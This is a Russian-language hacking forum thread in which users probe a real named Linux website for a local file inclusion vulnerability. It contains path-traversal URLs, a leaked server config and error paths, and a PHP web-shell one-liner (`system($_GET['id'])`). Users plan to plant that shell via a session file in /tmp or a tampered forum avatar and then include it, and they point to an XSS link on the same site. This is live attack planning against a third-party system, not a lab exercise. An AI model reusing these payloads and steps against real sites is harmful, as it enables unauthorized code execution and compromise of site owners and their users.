Разве это не локальный инклуд?

[Ar3s]

h__p://rus-linux.net/nlib.php?name=/MyLDP/freesoft/FreeBooks/free20books.html

Пробовал подставлять трэш разный. Узнал только путь home/httpd/vhosts/rus-linux.net/httpdocs/

 

[DarckSol]

Ну исходя из названия функции "include" это инклудинг, но он видимо не рабочий по каким то причинам... по директориям вроде тоже ходить не получается... так что по моему не рабочий, но я могу и ошибаться...

 

[DASM32]

Ar3s
Он самый.
http://rus-linux.net/nlib.php?name=.htaccess

#Action phpcgi-script /cgi-bin/php #AddHandler phpcgi-script .php # # Apache/PHP/Drupal settings: # # Protect files and directories from prying eyes. Order allow,deny # Don't show directory listings for URLs which map to a directory. Options -Indexes # Follow symbolic links in this directory. Options +FollowSymLinks # Set the default handler. DirectoryIndex index.php # ▌║Ю═║═БК╒═БЛ html Д═╘╚К ╙═╙ php. AddType application/x-httpd-php .htm .html .php # Override PHP settings. More in sites/default/settings.php # but the following cannot be changed at runtime. # PHP 4, Apache 1. php_value magic_quotes_gpc 0 php_value register_globals 0 php_value session.auto_start 0 php_value mbstring.http_input pass php_value mbstring.http_output pass php_value mbstring.encoding_translation 0 # PHP 4, Apache 2. php_value magic_quotes_gpc 0 php_value register_globals 0 php_value session.auto_start 0 php_value mbstring.http_input pass php_value mbstring.http_output pass php_value mbstring.encoding_translation 0 # PHP 5, Apache 1 and 2. # # php_value magic_quotes_gpc 0 # php_value register_globals 0 # php_value session.auto_start 0 # php_value mbstring.http_input pass # php_value mbstring.http_output pass # php_value mbstring.encoding_translation 0 # # Requires mod_expires to be enabled. # Enable expirations. ExpiresActive On # Cache all files for 2 weeks after access (A). ExpiresDefault A1209600 # Do not cache dynamically generated pages. ExpiresByType text/html A1 # Various rewrite rules. RewriteEngine on # If your site can be accessed both with and without the 'www.' prefix, you # can use one of the following settings to redirect users to your preferred # URL, either WITH or WITHOUT the 'www.' prefix. Choose ONLY one option: # # To redirect all users to access the site WITH the 'www.' prefix, # (http://example.com/... will be redirected to http://www.example.com/...) # adapt and uncomment the following: # RewriteCond %{HTTP_HOST} ^example\.com$ [NC] # RewriteRule ^(.*)$ http://www.example.com/$1 [L,R=301] # # To redirect all users to access the site WITHOUT the 'www.' prefix, # (http://www.example.com/... will be redirected to http://example.com/...) # uncomment and adapt the following: # RewriteCond %{HTTP_HOST} ^www\.example\.com$ [NC] # RewriteRule ^(.*)$ http://example.com/$1 [L,R=301] # Modify the RewriteBase if you are using Drupal in a subdirectory or in a # VirtualDocumentRoot and the rewrite rules are not working properly. # For example if your site is at http://example.com/drupal uncomment and # modify the following line: # RewriteBase /drupal # # If your site is running in a VirtualDocumentRoot at http://example.com/, # uncomment the following line: # RewriteBase / # Rewrite URLs of the form 'index.php?q=x'. # Customized error messages. RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule ^(.*)$ err404.php?q=$1 [L,QSA] # ErrorDocument 404 /err404.php # RewriteRule ^(.*)$ index.php?q=$1 [L,QSA] # $Id: .htaccess,v 1.90 2007/10/05 14:43:23 dries Exp $ AddDefaultCharset koi8-r php_value display_errors on

Также нормально выставлен basedir

Warning: file_exists() [function.file-exists]: open_basedir restriction in effect. File(/home/httpd/vhosts/rus-linux.net/httpdocs/../) is not within the allowed path(s): (/home/httpd/vhosts/rus-linux.net/httpdocs:/tmp) in /home/httpd/vhosts/rus-linux.net/httpdocs/nlib.php on line 112

 

[DASM32]

Хотя по директориям тоже не получилось походить... Хмм.

 

[TrueUser]

А урл не пробовали подставлять?

 

[Ar3s]

Естественно пробовали...

 

[Ar3s]

Я даже пытался с соседних сайтов роботс просмотреть. Не прыгает в другие директории. ммммм.

rus-linux.net/main.php?name=../../../../../../home/httpd/vhosts/vip-warez.net/httpdocs/robotx.txt

Последние изменения в содержание файла внесены
Warning: filemtime() [function.filemtime]: open_basedir restriction in effect. File(txt/../../../../../../home/httpd/vhosts/vip-warez.net/httpdocs/robotx.txt) is not within the allowed path(s): (/home/httpd/vhosts/rus-linux.net/httpdocs:/tmp) in /home/httpd/vhosts/rus-linux.net/httpdocs/main.php on line 96
01.01.1970.

Заинтересовала строка "Последние изменения в содержание файла внесены"

 

[TrueUser]

/home/httpd/vhosts/rus-linux.net/httpdocs:/tmp

Тебя не заинтересовало что вроде как из темпа можно инклюдить? Залей в темп шелл и вуаля

 

[lisa99]

Залей в темп шелл

интересно, в чем же тогда смысл локального инклуда при наличии RFI и возможности залить тот же r57?

 

[TrueUser]

смысл локального инклуда

Заключается в исполнении своего кода от имени вебсервера Ну вот файлы в папочке /tmp не являются доступными для исполнения через веб.
То есть если даже умудриться туда просто загрузить свой файлег, то добраться до него не выйдет, а тут файл из темпа подхватывается доступным через веб скриптом.

 

[Ar3s]

Осталась самая малость. Залить шелл в /tmp... Юморист.

 

[lisa99]

ага! вот видишь,TrueUser
твой совет настолько смешон, что даже сурового Aresa улыбнуло.

В r57 встроены скрипты обхода, например, safe mode on
но я не разу не видела, чтобы они работали)

 

[Ar3s]

Ты опять все неправильно воспринимаешь.

 

[test12]

в принципе по умолчанию сессия создается в темпе, в теории можно зарегистрироваться с ником <? system($_GET["id"]); ?> и если оно заносится в сессию - смотрим кукис k0duprub6fknpnlit95qj8t324, в теории должна и создаться соответственный файл /tmp/sess_k0duprub6fknpnlit95qj8t324

\\пробывал у меня не вышло
\\\\ xss http://rus-linux.net/profile.php?id=1345

 

[TrueUser]

ага! вот видишь,TrueUser
твой совет настолько смешон, что даже сурового Aresa улыбнуло.

:worthy:

ага и собственно

:russian_roulette:

 

[lisa99]

ага и собственно

дадада. вот ты меня правильно понял :P
вот только шелл - венец творенья , имхо, при взломе ...

 

[TrueUser]

Не знаю из какого пацтала ты отрыла свои шеллы ну собственно это и не важно.
Не понятно почему ты прицепилась к слову шелл? Знакомое сочетание буков???

<? system($_GET["id"]); ?>

Ты знаешь что это? Ну так по секрету под большим хайдом как обычно может поделишься?
И вообще затеяла какую то хренотень. Собственно вопрос поднятый в сабже фактически решен на 50% осталось только использовать какую либо еще уязвимость чтобы залить файл в темп понеслась.
Пжалста не надо больше комментить не в тему

 

[test12]

1. Что тебя смущает в конструкции <? system($_GET["id"]); ?> ? (если есть сомнения в работоспособности метода, то напиши что не так, постараюсь расказать…)

2. Определись с кем общаешься, цитируешь мой текст, а пишешь кому то другому… «И вообще затеяла какую то хренотень»

3. «Собственно вопрос поднятый в сабже фактически решен на 50%» - ну тогда смело можно говорить что он НЕ решен на 50% (будь проще, не принимай все в штыки)

4. По делу – можно попробовать через форум. Регистрируемся – заливаем аватар (в конец реального аватара дописываем «полезный» код) – загружаем, он проверку проходит на валидность - локально инклудим… проблема – не известет полный пусть куда складывают аватары (надеюсь не в базе )) )

 

[DASM32]

test12

Это было первое о чем бы следовало подумать.
Но phpBB такой phpBB, что путь к аватаре там так просто не получишь.
Аватары получают из http://rus-linux.net/forum/download/file.p..._1256117209.jpg, но на самом деле имя файла там совсем другое, используется images/avatars/upload/<avatar-salt>_<id-юзера>.jpg. Avatar-salt берется из БД.

 

[Pernat1y]

такую энергию, да в мирное русло...
лучше сайт мелкомягких ломайте =)